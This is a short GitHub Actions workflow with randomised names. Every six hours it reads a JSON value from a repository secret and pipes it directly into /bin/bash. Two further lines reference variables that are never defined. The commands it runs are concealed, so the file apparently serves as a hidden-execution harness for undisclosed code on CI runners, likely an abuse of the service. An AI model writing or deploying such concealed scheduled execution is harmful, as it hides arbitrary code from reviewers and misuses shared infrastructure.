name: dongxinchang5647
on:
  workflow_dispatch:
  schedule:
    - cron: '39 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dongxinchang5647
        env:
          xszn960: ${{ secrets.xszn960 }}
        run: |
          echo $xszn960 | jq -r .l3473 | /bin/bash
          echo $ktl01558 | jq -r .krbnb82764 | /bin/bash
          echo $dgpo882 | jq -r .vbp45942 | /bin/bash

